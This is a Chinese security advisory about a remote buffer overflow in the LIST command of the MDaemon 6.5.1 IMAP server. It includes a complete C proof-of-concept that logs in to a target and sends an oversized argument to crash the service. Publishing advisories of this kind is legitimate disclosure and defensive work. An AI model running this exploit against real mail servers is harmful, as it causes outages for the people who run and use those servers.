首页 -> 安全研究

安全研究

绿盟月刊
绿盟安全月刊->第52期->最新漏洞
期刊号: 类型: 关键词:
MDaemon IMAP服务程序LIST命令远程缓冲区溢出漏洞

日期:2004-10-10

发布日期:2004-09-22
更新日期:2004-09-24

受影响系统:
Alt-N MDaemon 6.5.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 11238

Alt-N MDaemon是一款基于Windows的邮件服务程序。

MDaemon IMAP服务程序对LIST命令处理缺少正确的缓冲区长度检查,远程攻击者可以利用这个漏洞对服务进行缓冲区溢出攻击,可能以进程权限执行任意指令。

MDaemon IMAP服务程序对LIST命令处理不正确,提交超长参数可导致缓冲区溢出,使程序崩溃,精心构建提交数据可能以进程权限执行任意指令。

<*来源:pigrelax (pigrelax@yandex.ru)
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=109591179510781&w=2
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

pigrelax (pigrelax@yandex.ru)提供了如下测试方法:

/////////////////////////////////////////////////////////////
//            Remote proof-of-concept exploit              //
//                         for                             //
//               Mdaemon IMAP server v6.5.1                //
//                       and                             //
//                possible other version.                  //
//                   Find bug: D_BuG.                      //
//                    Author: D_BuG.                       //
//                     D_BuG@bk.ru                         //                
//                   Data: 16/09/2004                      //
//                     NOT PUBLIC!                         //
//                                                         //
/////////////////////////////////////////////////////////////

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>

int     sock,err;
struct  sockaddr_in sa;


int main (int argc, char *argv[])
    
    {
    
    printf("Remote proof-of-concept(buffer overflow) exploit\n");
    printf("                         for                              \n");
    printf("Mdaemon IMAP server v6.5.1 and possible other version.\n");                  \
  if(argc!=3)
    {
    printf("Usage: %s <IPADDRESS> <PORT>\n",argv[0]);
    printf("e.g.:%s 192.168.1.1 143\n",argv[0]);
    exit(-1);
    }


    sa.sin_family=AF_INET;
    sa.sin_port=htons(atoi(argv[2]));
    if(inet_pton(AF_INET, argv[1], &sa.sin_addr) <= 0)
    printf("Error inet_pton\n");
        
    sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
    
    printf("[~]Connecting...\n");
    
    if(connect(sock,(struct sockaddr *)&sa,sizeof(sa)) <0)
    {
    printf("[-]Connect filed....\nExit...\n");
    exit(-1);
    }


char send[]="0001 LOGIN ""test"" ""console""\r\n";
char send3[]=
"007x LIST "
"""aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaAAAA""" """ \
*BBBBBBBBBBaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAc" \
"" "\r\n\r\n";
char rcv[1024];


        printf("[+]Ok!\n");
        sleep(2);
        printf("[~]Get banner...\n");
        if(read(sock,&rcv,sizeof(rcv)) !=-1){}
            
        if(strstr(rcv,"IMAP")==NULL)
        {
        printf("[-]Failed!\n");
        }
        else
        {
        printf("[+]Ok!\n");
            }
                                
        printf("[~]Send LOGIN and PASSWORD...\n");
        write(sock,send,sizeof(send)-1);
        sleep(2);
        memset(rcv,0,1024);
        if(read(sock,&rcv,sizeof(rcv)) !=-1){}
        
        if(strstr(rcv,"OK")==NULL)
        {
        printf("[-]Failed login or password...\nExit...");
        exit(-1);
        }
        
        printf("[+]Ok!\n");
        
        printf("[~]Send LIST...\n");
        write(sock,send3,sizeof(send3)-1);
        sleep(2);
        memset(rcv,0,1024);
        if(read(sock,&rcv,sizeof(rcv)) !=-1){}
        
        if(strstr(rcv,"BAD")!=NULL)
        {
        printf("[-]Exploit filed...please check your version Mdaemon!\n");
        printf("[-]Exit...\n");
        exit(-1);
        }
        printf("[+]Ok!\n");
        printf("[+]Crash service.....\n");
        printf("[~]Done.\n");
        
        close(sock);
        
return 0;

}

建议:
--------------------------------------------------------------------------------
厂商补丁:

Alt-N
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.altn.com
版权所有,未经许可,不得转载
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客